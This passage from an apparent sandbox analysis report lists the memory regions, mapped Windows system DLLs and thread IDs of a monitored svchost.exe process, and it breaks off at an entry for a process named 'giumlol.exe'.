end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 2697 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 2698 start_va = 0xb20000 end_va = 0xf1afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 2699 start_va = 0xf20000 end_va = 0xf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 2700 start_va = 0xfa0000 end_va = 0x101ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 2701 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2702 start_va = 0x1040000 end_va = 0x1040fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001040000" filename = "" Region: id = 2703 start_va = 0x1050000 end_va = 0x1050fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001050000" filename = "" Region: id = 2704 start_va = 0x1060000 end_va = 0x1066fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 2705 start_va = 0x1070000 end_va = 0x1070fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001070000" filename = "" Region: id = 2706 start_va = 0x1080000 end_va = 0x1080fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 2707 start_va = 0x10f0000 end_va = 0x10f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 2708 start_va = 0x1100000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 2709 start_va = 0x1280000 end_va = 0x137ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 2710 start_va = 0x1380000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 2711 start_va = 0x1400000 end_va = 0x147ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 2712 start_va = 0x1480000 end_va = 0x1480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 2713 start_va = 0x1490000 end_va = 0x1490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001490000" filename = "" Region: id = 2714 start_va = 0x14f0000 end_va = 0x14f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 2715 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 2716 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 2717 start_va = 0x1700000 end_va = 0x177ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 2718 start_va = 0x1780000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001780000" filename = "" Region: id = 2719 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 2720 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 2721 start_va = 0x1a00000 end_va = 0x1a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 2722 start_va = 0x1a90000 end_va = 0x1b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a90000" filename = "" Region: id = 2723 start_va = 0x1c00000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 2724 start_va = 0x1d00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 2725 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 2726 start_va = 0x1f00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 2727 start_va = 0x2000000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 2728 start_va = 0x2080000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 2729 start_va = 0x2200000 end_va = 0x22dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2730 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 2731 start_va = 0x2400000 end_va = 0x2736fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2732 start_va = 0x2740000 end_va = 0x283ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 2733 start_va = 0x2840000 end_va = 0x293ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 2734 start_va = 0x2940000 end_va = 0x2a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 2735 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 2736 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 2737 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 2738 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 2739 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 2740 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 2741 start_va = 0x3200000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 2742 start_va = 0x3300000 end_va = 0x33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 2743 start_va = 0x3400000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 2744 start_va = 0x3500000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 2745 start_va = 0x3600000 end_va = 0x36fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2746 start_va = 0x3700000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 2747 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2748 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2749 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2750 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2751 start_va = 0x7ff60e670000 end_va = 0x7ff60e67cfff monitored = 0 entry_point = 0x7ff60e673980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2752 start_va = 0x7ffc44ad0000 end_va = 0x7ffc44b02fff monitored = 0 entry_point = 0x7ffc44adae20 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 2753 start_va = 0x7ffc45b70000 end_va = 0x7ffc45d27fff monitored = 0 entry_point = 0x7ffc45b75550 region_type = mapped_file name = "wmalfxgfxdsp.dll" filename = "\\Windows\\System32\\WMALFXGFXDSP.dll" (normalized: "c:\\windows\\system32\\wmalfxgfxdsp.dll") Region: id = 2754 start_va = 0x7ffc4c370000 end_va = 0x7ffc4c383fff monitored = 0 entry_point = 0x7ffc4c371800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2755 start_va = 0x7ffc4c390000 end_va = 0x7ffc4c485fff monitored = 0 entry_point = 0x7ffc4c3c9590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2756 start_va = 0x7ffc4dbb0000 end_va = 0x7ffc4dbc0fff monitored = 0 entry_point = 0x7ffc4dbb2fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2757 start_va = 0x7ffc4ee90000 end_va = 0x7ffc4ef0efff monitored = 0 entry_point = 0x7ffc4eea7110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2758 start_va = 0x7ffc53440000 end_va = 0x7ffc5346afff monitored = 0 entry_point = 0x7ffc5344c3c0 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 2759 start_va = 0x7ffc53470000 end_va = 0x7ffc5357cfff monitored = 0 entry_point = 0x7ffc5349f420 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 2760 start_va = 0x7ffc54990000 end_va = 0x7ffc5499dfff monitored = 0 entry_point = 0x7ffc54992e50 region_type = mapped_file name = "cmintegrator.dll" filename = "\\Windows\\System32\\cmintegrator.dll" (normalized: "c:\\windows\\system32\\cmintegrator.dll") Region: id = 2761 start_va = 0x7ffc549a0000 end_va = 0x7ffc549d7fff monitored = 0 entry_point = 0x7ffc549a68f0 region_type = mapped_file name = "wcmcsp.dll" filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: "c:\\windows\\system32\\wcmcsp.dll") Region: id = 2762 start_va = 0x7ffc54a10000 end_va = 0x7ffc54aa8fff monitored = 0 entry_point = 0x7ffc54a2a090 region_type = mapped_file name = "wcmsvc.dll" filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll") Region: id = 2763 start_va = 0x7ffc54b20000 end_va = 0x7ffc54b39fff monitored = 0 entry_point = 0x7ffc54b22430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2764 start_va = 0x7ffc54ff0000 end_va = 0x7ffc55077fff monitored = 0 entry_point = 0x7ffc55004510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 2765 start_va = 0x7ffc55080000 end_va = 0x7ffc5518afff monitored = 0 entry_point = 0x7ffc550c2610 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 2766 start_va = 0x7ffc55190000 end_va = 0x7ffc551a5fff monitored = 0 entry_point = 0x7ffc551919f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2767 start_va = 0x7ffc552a0000 end_va = 0x7ffc5530ffff monitored = 0 entry_point = 0x7ffc552c2960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 2768 start_va = 0x7ffc55820000 end_va = 0x7ffc55857fff monitored = 0 entry_point = 0x7ffc55838cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2769 start_va = 0x7ffc55860000 end_va = 0x7ffc5586afff monitored = 0 entry_point = 0x7ffc55861d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2770 start_va = 0x7ffc55870000 end_va = 0x7ffc558b7fff monitored = 0 entry_point = 0x7ffc5587a1e0 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 2771 start_va = 0x7ffc57510000 end_va = 0x7ffc5756cfff monitored = 0 entry_point = 0x7ffc57522bf0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 2772 start_va = 0x7ffc576e0000 end_va = 0x7ffc57890fff monitored = 0 entry_point = 0x7ffc57733690 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 2773 start_va = 0x7ffc57bb0000 end_va = 0x7ffc57ce5fff monitored = 0 entry_point = 0x7ffc57bdf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 2774 start_va = 0x7ffc57e70000 end_va = 0x7ffc57f37fff monitored = 0 entry_point = 0x7ffc57eb13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2775 start_va = 0x7ffc581a0000 end_va = 0x7ffc581e9fff monitored = 0 entry_point = 0x7ffc581aac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 2776 start_va = 0x7ffc58d40000 end_va = 0x7ffc58d50fff monitored = 0 entry_point = 0x7ffc58d43320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 2777 start_va = 0x7ffc58fa0000 end_va = 0x7ffc58fa8fff monitored = 0 entry_point = 0x7ffc58fa19a0 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 2778 start_va = 0x7ffc58fb0000 end_va = 0x7ffc58fbafff monitored = 0 entry_point = 0x7ffc58fb1cd0 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 2779 start_va = 0x7ffc58fd0000 end_va = 0x7ffc58fe7fff monitored = 0 entry_point = 0x7ffc58fd5910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2780 start_va = 0x7ffc5a2c0000 end_va = 0x7ffc5a2d2fff monitored = 0 entry_point = 0x7ffc5a2c2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2781 start_va = 0x7ffc5a3a0000 end_va = 0x7ffc5a525fff monitored = 0 entry_point = 0x7ffc5a3ed700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2782 start_va = 0x7ffc5a850000 end_va = 0x7ffc5a876fff monitored = 0 entry_point = 0x7ffc5a857940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2783 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2784 start_va = 0x7ffc5abb0000 end_va = 0x7ffc5abe1fff monitored = 0 entry_point = 0x7ffc5abc2340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 2785 start_va = 0x7ffc5ae30000 end_va = 0x7ffc5ae53fff monitored = 0 entry_point = 0x7ffc5ae33260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2786 start_va = 0x7ffc5afd0000 end_va = 0x7ffc5b0c3fff monitored = 0 entry_point = 0x7ffc5afda960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 2787 start_va = 0x7ffc5b240000 end_va = 0x7ffc5b24bfff monitored = 0 entry_point = 0x7ffc5b2427e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2788 start_va = 0x7ffc5b320000 end_va = 0x7ffc5b350fff monitored = 0 entry_point = 0x7ffc5b327d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2789 start_va = 0x7ffc5b590000 end_va = 0x7ffc5b5aefff monitored = 0 entry_point = 0x7ffc5b595d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2790 start_va = 0x7ffc5b700000 end_va = 0x7ffc5b75bfff monitored = 0 entry_point = 0x7ffc5b716f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2791 start_va = 0x7ffc5b8d0000 end_va = 0x7ffc5b8dafff monitored = 0 entry_point = 0x7ffc5b8d19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2792 start_va = 0x7ffc5bab0000 end_va = 0x7ffc5badcfff monitored = 0 entry_point = 0x7ffc5bac9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2793 start_va = 0x7ffc5bc40000 end_va = 0x7ffc5bc95fff monitored = 0 entry_point = 0x7ffc5bc50bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2794 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2795 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2796 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2797 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2798 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2799 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2800 start_va = 0x7ffc5bf10000 end_va = 0x7ffc5bf95fff monitored = 0 entry_point = 0x7ffc5bf1d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2801 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2802 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2803 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2804 start_va = 0x7ffc5e1e0000 end_va = 0x7ffc5e2a0fff monitored = 0 entry_point = 0x7ffc5e200da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2805 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2806 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2807 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2808 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2809 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2810 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2811 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2812 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2813 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2814 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2815 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2816 start_va = 0x7ffc5f760000 end_va = 0x7ffc5f806fff monitored = 0 entry_point = 0x7ffc5f76b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2817 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4137 start_va = 0x3800000 end_va = 0x3a5cfff monitored = 0 entry_point = 0x3888610 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 4139 start_va = 0x3800000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 4140 start_va = 0x3800000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 4142 start_va = 0x3900000 end_va = 0x3f2ffff monitored = 0 entry_point = 0x39193f0 region_type = mapped_file name = "sppsvc.exe" filename = "\\Windows\\System32\\sppsvc.exe" (normalized: "c:\\windows\\system32\\sppsvc.exe") Region: id = 4146 start_va = 0x2740000 end_va = 0x27d4fff monitored = 0 entry_point = 0x27736c0 region_type = mapped_file name = "bisrv.dll" filename = "\\Windows\\System32\\bisrv.dll" (normalized: "c:\\windows\\system32\\bisrv.dll") Region: id = 4210 start_va = 0x3900000 end_va = 0x3f2ffff monitored = 0 entry_point = 0x39193f0 region_type = mapped_file name = "sppsvc.exe" filename = "\\Windows\\System32\\sppsvc.exe" (normalized: "c:\\windows\\system32\\sppsvc.exe") Region: id = 6447 start_va = 0x1090000 end_va = 0x10a4fff monitored = 0 entry_point = 0x1098db0 region_type = mapped_file name = "fthsvc.dll" filename = "\\Windows\\System32\\fthsvc.dll" (normalized: "c:\\windows\\system32\\fthsvc.dll") Region: id = 8162 start_va = 0x2080000 end_va = 0x2159fff monitored = 0 entry_point = 0x20b3c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Thread: id = 145 os_tid = 0x4b8 Thread: id = 146 os_tid = 0x808 Thread: id = 147 os_tid = 0x6ec Thread: id = 148 os_tid = 0x978 Thread: id = 149 os_tid = 0xd4c Thread: id = 150 os_tid = 0x29c Thread: id = 151 os_tid = 0xab8 Thread: id = 152 os_tid = 0xc1c Thread: id = 153 os_tid = 0xc30 Thread: id = 154 os_tid = 0xabc Thread: id = 155 os_tid = 0xfac Thread: id = 156 os_tid = 0x47c Thread: id = 157 os_tid = 0x470 Thread: id = 158 os_tid = 0x468 Thread: id = 159 os_tid = 0x440 Thread: id = 160 os_tid = 0x43c Thread: id = 161 os_tid = 0x434 Thread: id = 162 os_tid = 0x158 Thread: id = 163 os_tid = 0x2f0 Thread: id = 164 os_tid = 0x2cc Thread: id = 165 os_tid = 0x168 Thread: id = 166 os_tid = 0x2d0 Thread: id = 167 os_tid = 0x210 Thread: id = 168 os_tid = 0x374 Process: id = "17" image_name = "giumlol.exe" filename = 